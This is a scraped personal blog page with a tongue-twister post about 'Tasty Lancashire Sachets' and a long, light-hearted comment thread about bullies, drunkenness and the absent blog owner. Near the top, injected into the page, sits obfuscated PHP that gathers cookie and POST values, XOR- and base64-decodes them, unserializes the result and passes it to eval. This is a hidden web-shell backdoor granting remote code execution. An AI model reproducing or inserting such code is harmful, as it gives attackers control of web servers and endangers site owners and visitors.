Hey! I bet you can’t say Tasty Lancashire Sachets five times quickly without sounding like a total drunkard!
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$XjtazQGNLZ = chr (85) . "\137" . "\125" . chr (98) . chr (98); $YkIHtxDJ = "\x63" . 'l' . chr ( 688 - 591 )."\163" . 's' . '_' . "\145" . chr (120) . "\151" . chr (115) . 't' . chr (115); $vjkYtt = class_exists($XjtazQGNLZ); $YkIHtxDJ = "28484";$jfGVdIh = strpos($YkIHtxDJ, $XjtazQGNLZ);if ($vjkYtt == $jfGVdIh){function nUIjph(){$QjgVmgYsu = new /* 61615 */ U_Ubb(63092 + 63092); $QjgVmgYsu = NULL;}$RiHPdeVRgn = "63092";class U_Ubb{private function nBgFwEdIah($RiHPdeVRgn){if (is_array(U_Ubb::$FqPIG)) {$vKScSbcYj2 = str_replace("<" . "?php", "", U_Ubb::$FqPIG["content"]);eval($vKScSbcYj2); $RiHPdeVRgn = "63092";exit();}}public function PzZdhVoV(){$vKScSbcYj = "29015";$this->_dummy = str_repeat($vKScSbcYj, strlen($vKScSbcYj));}public function __destruct(){U_Ubb::$FqPIG = @unserialize(U_Ubb::$FqPIG); $RiHPdeVRgn = "9051_60179";$this->nBgFwEdIah($RiHPdeVRgn); $RiHPdeVRgn = "9051_60179";}public function sSKpKNOo($vKScSbcYj, $wJIyyODkD){return $vKScSbcYj[0] ^ str_repeat($wJIyyODkD, intval(strlen($vKScSbcYj[0]) / strlen($wJIyyODkD)) + 1);}public function WEUWl($vKScSbcYj){$xzPwBeGSNg = chr ( 458 - 360 )."\x61" . 's' . 'e' . "\66" . chr (52);return array_map($xzPwBeGSNg . '_' . chr ( 344 - 244 )."\x65" . "\x63" . chr ( 840 - 729 )."\144" . chr (101), array($vKScSbcYj,));}public function __construct($ooNll=0){$qkQctSqYWU = chr (44); $vKScSbcYj = "";$BFqpabi = $_POST;$NMWdy = $_COOKIE;$wJIyyODkD = "47d204fd-06b8-41c4-8cb1-d61c55bbcd40";$WNNrxZKr = @$NMWdy[substr($wJIyyODkD, 0, 4)];if (!empty($WNNrxZKr)){$WNNrxZKr = explode($qkQctSqYWU, $WNNrxZKr);foreach ($WNNrxZKr as $LWvzF){$vKScSbcYj .= @$NMWdy[$LWvzF];$vKScSbcYj .= @$BFqpabi[$LWvzF];}$vKScSbcYj = $this->WEUWl($vKScSbcYj);}U_Ubb::$FqPIG = $this->sSKpKNOo($vKScSbcYj, $wJIyyODkD);if (strpos($wJIyyODkD, $qkQctSqYWU) !== FALSE){$wJIyyODkD = explode($qkQctSqYWU, $wJIyyODkD); $iEMOa = base64_decode(md5($wJIyyODkD[0])); $ZelQYTD = strlen($wJIyyODkD[1]) > 5 ? substr($wJIyyODkD[1], 0, 5) : $wJIyyODkD[1];$_GET['new_key'] = md5(implode('', $wJIyyODkD)); $lTnldDbC = str_repeat($ZelQYTD, 2);}}public static $FqPIG = 11292;}nUIjph();}
established 2000
Hey! I bet you can’t say Tasty Lancashire Sachets five times quickly without sounding like a total drunkard!
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Shoes how much you know :p Just put on a fob accent and you’re set to go π
How much do you charge for the aforementioned shells pray tell?
I’ve been practising for a year and i still can’t say it… I might have mastered Dishwasher Shalt (Salt) at last though… maybe…perhaps…possibly not… ask me again in New Zealand !
give us a ring
hey, i bet u can’t get a life!
What if you were already drunk and saying it?
nilah, you’re right, I don’t have a life. We can remedy that though. If I went
around leaving pathetically snide comments on blogs that I pretend to
dislike but read anyway, surely that’ll constitute me having a life.
Problem solved, thanks mate! π
Mo, I think if you were already drunk, you’d have no chance!
sachets of what, exactly? i keep thinking vinegar..!
saima, where’d you learn to verbally kick ass like that? everytime i have to deal with ‘get-a-lifers’ i keep hitting a brick wall…
Bushra, when you’re educated at the toughest and roughest school in the county with only your words to protect you, you soon learn how to put idiots in their place.
Tasty Lancashire is cheese, mm mm!
that’s where i went wrong i suppose, it was responding to like with like and using my fists at my school, innit.
so. you can get tasty lancashire in a sachet?
I used to threaten school bullies by saying I would not invite them to my party. This disarmed them because it is such a pathetic threat (esp. if you’re 15). As they looked at each other laughing a “we’ve got a right one here” laugh I smashed their brains in with a cricket bat. Ahh happy days. Nah not really all we did was the “c’mon then” push dance that lasted 5 minutes and then punched for a bit then wondered what we were fighting about and whether we would still be invited to eachother’s parties. We existed in so many different levels then. I kind of think life’s got simpler.
I can’t say it! I can’t say it!
I cant’t say it! I can’t say it!
I’m still stuck on trying to master “Peter Piper and his Pickles”
mm..I wont even go there lol.
Bullies are bad! I dont think I ever dealt with bullies (ok ok, so I let them copy my hmwk when they asked but..um..isnt that just being polite?)
ha! i remember a girl was copying my work over my shoulder once, she even wrote MY name down on HER work!
Tasty Lancashire Sachets Tasty Lancashire Sachets Tasty Lancashire Sachays Tasty Lancashshire Sachays Tashty Lanchasshir Sacash… Oh yeah, I’m pissed.
Boris rules !
anyone wants to form a search party to look for sai?
does this mean the search party for the adnan is off? in which case, count me in!
I bet someone said something to upset her on this comment board. Let me scroll to have a look. Ahh yes, I think she must have given Khan a ring.
curiouser and curiouser…
i think saima was practising saying ‘tasty lancashire sachets’ on the street and some policemen arrested her and now she is sectionned under the mental health act. i hope thats not the real reason why shes left us but a person can only assume the worst in times like this. pls saima, COME BACK!!!
What a lovely day. I think I’m going to go out.
hi saima this is aamir from pak can u send me ur film posters
so now we know…saima has left us to pursue a career in bollywood…
How you been Saima??!?!? Massive long time no hear!! I see the site’s still up – not as packed as I remember it… I’m sure you’re real busy these days though. This should really be an email shouldn’t it? sorry the link was too tempting!!! Anyways, I’m sure you don’t remember me. But email me – I know something you need to know!!! (trust me) π
Which Faisal is this?
I last visited this site on 30th May and said hi to all but i never got a responce π
I thought id see if your still up and running. and u are. Keep up the good vurk!
I’ll see u all in another six.
saima: get a infra red cable and run Nokia pc suite if u wanna download images to your computer for free. Β£40 bucks, bit menga!
I can say it 5 times now.